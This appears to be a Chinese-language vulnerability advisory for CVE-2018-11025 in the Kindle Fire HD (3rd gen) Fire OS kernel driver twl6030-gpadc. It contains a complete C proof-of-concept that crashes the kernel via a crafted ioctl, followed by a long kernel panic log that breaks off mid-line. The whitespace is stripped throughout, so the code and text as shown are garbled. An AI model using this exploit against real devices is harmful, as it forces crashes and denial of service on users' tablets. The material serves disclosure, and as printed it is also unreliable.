（CVE-2018-11025）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞

（CVE-2018-11025）AmazonKindleFireHD(3rd)FireOSkernel组件安全漏洞一、漏洞简介AmazonKindleFireHD（3rd）FireOS4.5.5.3内核组件中的内核模块/omap/drivers/mfd/twl6030-gpadc.c允许攻击者通过设备/dev/twl6030上的ioctl的参数注入特制的参数-gpadc命令24832并导致内核崩溃。要探索此漏洞，必须打开设备文件/dev/twl6030-gpadc，并使用命令24832和精心设计的有效负载作为第三个参数在此设备文件上调用ioctl系统调用。二、漏洞影响FireOS4.5.5.3三、复现过程poc/*

*ThisispocofKindleFireHD3rd

*Abugintheioctlinterfaceofdevicefile/dev/twl6030-gpadccauses

*thesystemcrashviaIOCTL24832.

*

*ThisPocshouldrunwithpermissiontodoioctlon/dev/twl6030-gpadc.

*

*/

#include<stdio.h>

#include<fcntl.h>

#include<errno.h>

#include<sys/ioctl.h>

conststaticchar*driver="/dev/twl6030-gpadc";

staticcommand=24832;

structtwl6030_gpadc_user_parms{

intchannel;

intstatus;

unsignedshortresult;

};

intmain(intargc,char**argv,char**env){

structtwl6030_gpadc_user_parmspayload;

payload.channel=0x9b2a9212;

payload.status=0x0;

payload.result=0x0;

intfd=0;

fd=open(driver,O_RDWR);

if(fd<0){

printf("Failedtoopen%s,witherrno%d\n",driver,errno);

system("echo1>/data/local/tmp/log");

return-1;

}

printf("Tryioctldevicefile'%s',withcommand0x%xandpayloadNULL\n",driver,command);

printf("Systemwillcrashandreboot.\n");

if(ioctl(fd,command,&payload)<0){

printf("Allocationofstructsfailed,%d\n",errno);

system("echo2>/data/local/tmp/log");

return-1;

}

close(fd);

return0;

}崩溃日志[18460.321624]Unabletohandlekernelpagingrequestatvirtualaddress4b3f25fc

[18460.330139]pgd=ca210000

[18460.333251][4b3f25fc]*pgd=00000000

[18460.337768]Internalerror:Oops:5[#1]PREEMPTSMPARM

[18460.343810]Moduleslinkedin:omaplfb(O)pvrsrvkm(O)pvr_logger(O)

[18460.351440]CPU:0Tainted:GO(3.4.83-gd2afc0bae69#1)

[18460.358825]PCisattwl6030_gpadc_ioctl+0x160/0x180

[18460.364379]LRisattwl6030_gpadc_conversion+0x5c/0x484

[18460.370452]pc:[<c031b080>]lr:[<c031a950>]psr:60030013

[18460.370452]sp:de94dd90ip:00000000fp:de94df04

[18460.383422]r10:00000000r9:dcccf608r8:bea875ec

[18460.389282]r7:de94c000r6:00000000r5:00006100r4:bea875ec

[18460.396697]r3:fffffeb4r2:4b3f2730r1:de94dee8r0:00000001

[18460.404113]Flags:nZCvIRQsonFIQsonModeSVC_32ISAARMSegmentuser

[18460.412048]Control:10c5387dTable:8a21004aDAC:00000015

[18460.418609]

[18460.418609]PC:0xc031b000:

[18460.423583]b000e24b101ce30f3eb4e34f3fffe0822082e0812102e51220e4e18120b3e5973008

[18460.434234]b020e294200c30d2200333a03000e35300000a000006e3e0000ce24bd01ce89da8f0

[18460.444885]b040e24b0e17e3a0100cebfcf5c4eafffff8e1a00004e24b1e17e3a0200cebfced7f

[18460.455444]b060e35000000afffff3eafffff1e51b2170e24b101ce30f3eb4e34f3fffe0812102

[18460.465972]b080e5122134e18120b3eaffffe303e0303c150b016c050b316ceaffffdfc0acabbc

[18460.476623]b0a0e1a0c00de92dd800e24cb004e59030e0e3530000159000ec03e00012e89da800

[18460.487182]b0c0e1a0c00de92dd800e24cb004e59000f0e89da800e1a0c00de92dd800e24cb004

[18460.497863]b0e0e5d020e9e5d030e8e1820003e2000003e89da800e1a0c00de92dd800e24cb004

[18460.508544]

[18460.508544]LR:0xc031a8d0:

[18460.513519]a8d0e89da878e1a00004ebffff20e2000003e350000213e0000a03a00000e89da878

[18460.524078]a8f0c09ba0c0e1a0c00de92ddff0e24cb004e24dd014e25090000a000114e59f5454

[18460.534759]a910e595008ce35000000a00010be2800004eb0e1ff0e1d910b6e35100019a00000a

[18460.545318]a930e595308ce3e06015e59f142ce5930000ebff4e6be595a08ce28a0004eb0e1f69

[18460.555999]a950e1a00006e24bd028e89daff0e595a08ce3a03f52e023a193e5933038e3530000

[18460.566680]a97013e0600f1afffff3e59a32c4e0818101e595c088e3130010e08c70081a000025

[18460.577331]a990e35100000a0000c4e1d930b8e35300010a0000d7e1d940b6e35400000a0000bc

[18460.587890]a9b0e3a0000ee3a01002e3a02090e5956088ebfff8bce35400010a0000d1e1d920b6

[18460.598571]

[18460.598571]SP:0xde94dd10:

[18460.603546]dd10000000000000000dde94dda010624dd3de94dd4cc031b08060030013ffffffff

[18460.614196]dd30de94dd7cbea875ecde94df04de94dd48c06a5318c000837000000001de94dee8

[18460.624877]dd504b3f2730fffffeb4bea875ec0000610000000000de94c000bea875ecdcccf608

[18460.635528]dd7000000000de94df0400000000de94dd90c031a950c031b08060030013ffffffff

[18460.646087]dd90de94ddac9b2a92120000000000000000000400000001f8fc0000000000000000

[18460.656738]ddb0c00795a000000001de94ddd4de94ddc8c00795b4c00792bcde94de0cde94ddd8

[18460.667419]ddd0c0070df8c00795acde94c0000000000100000004dd32f8f46000001300000001

[18460.678100]ddf00000000100000004dd32f8000000000000000000de94de10c00723a0c06a4818

[18460.688629]

[18460.688659]FP:0xde94de84:

[18460.693725]de84de94de90c0207454c00bd9200000001ec26fda80de94ded4de94dea8c00723a0

[18460.704284]dea4000fffff00000000ffffffff000000020000000100000000de94df1400000000

[18460.714935]dec400000001dcccf608cfa9bf00de94defcde94dee0c02089fc0000000000000000

[18460.725616]dee40000000000000000d683fb4000000004d683fb40de94df74de94df08c0136044

[18460.736328]df04c031af2c0000000000000000000000000000000100000000dd188490d8f925d8

[18460.746856]df24de94df0cde94c000bea87618bea875ec00006100d683fb4000000004de94c000

[18460.757537]df4400000000de94df6400000000bea875ec00006100d683fb4000000004de94c000

[18460.768096]df6400000000de94dfa4de94df78c01365e0c0135fc4000000000000000000000400

[18460.778625]

[18460.778625]R1:0xde94de68:

[18460.783721]de68c2572140de94debc0000000100000028000fffff00000001de94dedcde94de90

[18460.794403]de88c0207454c00bd9200000001ec26fda80de94ded4de94dea8c00723a0000fffff

[18460.804962]dea800000000ffffffff000000020000000100000000de94df140000000000000001

[18460.815643]dec8dcccf608cfa9bf00de94defcde94dee0c02089fc000000000000000000000000

[18460.826202]dee800000000d683fb4000000004d683fb40de94df74de94df08c0136044c031af2c

[18460.836730]df080000000000000000000000000000000100000000dd188490d8f925d8de94df0c

[18460.847381]df28de94c000bea87618bea875ec00006100d683fb4000000004de94c00000000000

[18460.858032]df48de94df6400000000bea875ec00006100d683fb4000000004de94c00000000000

[18460.868713]

[18460.868713]R3:0xfffffe34:

[18460.873687]fe34****************************************************************

[18460.884246]fe54****************************************************************

[18460.894805]fe74****************************************************************

[18460.905456]fe94****************************************************************

[18460.916137]feb4****************************************************************

[18460.926788]fed4****************************************************************

[18460.937347]fef4****************************************************************

[18460.948028]ff14****************************************************************

[18460.958709]

[18460.958709]R7:0xde94bf80:

[18460.963684]bf80de926680c00635cc00000013de84190cde926680c00635cc0000001300000000

[18460.974365]bfa00000000000000000de94bff4de94bfb8c0068af4c00635d80000000000000000

[18460.985015]bfc0de926680000000000000000000000000de94bfd0de94bfd000000000de84190c

[18460.995574]bfe0c0068a64c004cd6400000000de94bff8c004cd64c0068a701d04e2fb1dfbe204

[18461.006225]c000000000000000000200000000c2572140c0a0e8400000000000000015cf9fca80

[18461.016906]c02000000000de94c000c09ddc50c2572140c25717c0c1617b40de94da7cde94d9c8

[18461.027587]c040c06a36e400000000000000000000000000000000000000000100000000000000

[18461.038146]c06000c5f4c05ebcc27f000000000000000000000000000000000000000000000000

[18461.048828]

[18461.048828]R9:0xdcccf588:

[18461.053802]f588dcccf588dcccf588000000000000000000000000c06bc674000200dac09dda58

[18461.064483]f5a80000000000000000dcccf5b0dcccf5b000000000dcccf5bcdcccf5bc00000000

[18461.075134]f5c85ae3ed25000000000000000000000000dcccf5e0000000000000000000000000

[18461.085815]f5e8002000000000000000000000dcccf5f4dcccf5f4dccb2440dccb244000000000

[18461.096343]f608000521800000000000000000000000000000000000000000c06b9600dd1a4800

[18461.107025]f628dcccf6e0dccb030000000c450000000100a0003b5ae3ed252bc5ac585ae3ed25

[18461.117675]f6482bc5ac585ae3ed252bc5ac580000000000000000000000000000000000000000

[18461.128234]f66800000000000000000000000000000000000000010000000000000000dcccf684

[18461.138885]Processtwl6030_gpadc_i(pid:12849,stacklimit=0xde94c2f8)

[18461.146697]Stack:(0xde94dd90to0xde94e000)

[18461.151611]dd80:de94ddac9b2a92120000000000000000

[18461.160827]dda0:000400000001f8fc0000000000000000c00795a000000001de94ddd4de94ddc8

[18461.170043]ddc0:c00795b4c00792bcde94de0cde94ddd8c0070df8c00795acde94c00000000001

[18461.179138]dde0:00000004dd32f8f460000013000000010000000100000004dd32f80000000000

[18461.188354]de00:00000000de94de10c00723a0c06a48180000000400000001dd32e0d8dd32f800

[18461.197570]de20:dd32e0000000000ade94c000c26fda80de94de54de94de40c02ba53cc0072360

[18461.206787]de40:dd32f800dd32e000de94de74de94de58c02c3c88c02ba518dd32e00000000002

[18461.215881]de60:00000002dd32fbbcc2572140de94debc0000000100000028000fffff00000001

[18461.225097]de80:de94dedcde94de90c0207454c00bd9200000001ec26fda80de94ded4de94dea8

[18461.234313]dea0:c00723a0000fffff00000000ffffffff000000020000000100000000de94df14

[18461.243408]dec0:0000000000000001dcccf608cfa9bf00de94defcde94dee0c02089fc00000000

[18461.252624]dee0:000000000000000000000000d683fb4000000004d683fb40de94df74de94df08

[18461.261840]df00:c0136044c031af2c0000000000000000000000000000000100000000dd188490

[18461.271057]df20:d8f925d8de94df0cde94c000bea87618bea875ec00006100d683fb4000000004

[18461.280151]df40:de94c00000000000de94df6400000000bea875ec00006100d683fb4000000004

[18461.289367]df60:de94c00000000000de94dfa4de94df78c01365e0c0135fc40000000000000000

[18461.298583]df80:00000400bea8761800010e5c0000000000000036c0013e0800000000de94dfa8

[18461.307800]dfa0:c0013c60c0136578bea8761800010e5c0000000400006100bea875ecbea875ec

[18461.316894]dfc0:bea8761800010e5c0000000000000036000000000000000000000000bea87604

[18461.326110]dfe0:00000000bea875d4000106980002918c60000010000000040000000000000000

[18461.335296]Backtrace:

[18461.338317][<c031af20>](twl6030_gpadc_ioctl+0x0/0x180)from[<c0136044>](do_vfs_ioctl+0x8c/0x5b4)

[18461.348571]r7:d683fb40r6:00000004r5:d683fb40r4:00000000

[18461.355560][<c0135fb8>](do_vfs_ioctl+0x0/0x5b4)from[<c01365e0>](sys_ioctl+0x74/0x84)

[18461.364807][<c013656c>](sys_ioctl+0x0/0x84)from[<c0013c60>](ret_fast_syscall+0x0/0x30)

[18461.374206]r8:c0013e08r7:00000036r6:00000000r5:00010e5cr4:bea87618

[18461.382507]Code:e24b101ce30f3eb4e34f3fffe0812102(e5122134)

[18461.401061]BoardInformation:

[18461.401061]Revision:0001

[18461.401092]Serial:0000000000000000

[18461.401092]SoCInformation:

[18461.401092]CPU:OMAP4470

[18461.401122]Rev:ES1.0

[18461.401122]Type:HS

[18461.401122]ProductionID:0002B975-000000CC

[18461.401122]DieID:1CC60000-50002FFF-0B00935D-11007004

[18461.401153]

[18461.406127]audit_printk_skb:111callbackssuppressed

[18461.406127]type=1400audit(1525657115.783:1097):avc:denied{getattr}forpid=12851comm="am"path="/system/bin/app_process"dev="mmcblk0p9"ino=32006scontext=u:r:untrusted_app:s0tcontext=u:object_r:zygote_exec:s0tclass=file

[18461.406280]type=1400audit(1525657115.783:1098):avc:denied{execute}forpid=12851comm="am"name="app_process"dev="mmcblk0p9"ino=32006scontext=u:r:untrusted_app:s0tcontext=u:object_r:zygote_exec:s0tclass=file

[18461.406524]type=1400audit(1525657115.783:1099):avc:denied{readopen}forpid=12851comm="am"name="app_process"dev="mmcblk0p9"ino=32006scontext=u:r:untrusted_app:s0tcontext=u:object_r:zygote_exec:s0tclass=file

[18461.406768]type=1400audit(1525657115.783:1100):avc:denied{execute_no_trans}forpid=12851comm="am"path="/system/bin/app_process"dev="mmcblk0p9"ino=32006scontext=u:r:untrusted_app:s0tcontext=u:object_r:zygote_exec:s0tclass=file

[18461.534057]---[endtracef98f4a7b98572f61]---

[18461.540374]Kernelpanic-notsyncing:Fatalexception

[18461.546173]CPU1:stopping

[18461.549285]Backtrace:

[18461.552459][<c0018148>](dump_backtrace+0x0/0x10c)from[<c0698bb8>](dump_stack+0x18/0x1c)

[18461.561828]r6:c09ddc50r5:c09dc844r4:00000001r3:c0a0e950

[18461.568969][<c0698ba0>](dump_stack+0x0/0x1c)from[<c0019bd8>](handle_IPI+0x190/0x1c4)

[18461.578185][<c0019a48>](handle_IPI+0x0/0x1c4)from[<c00084fc>](gic_h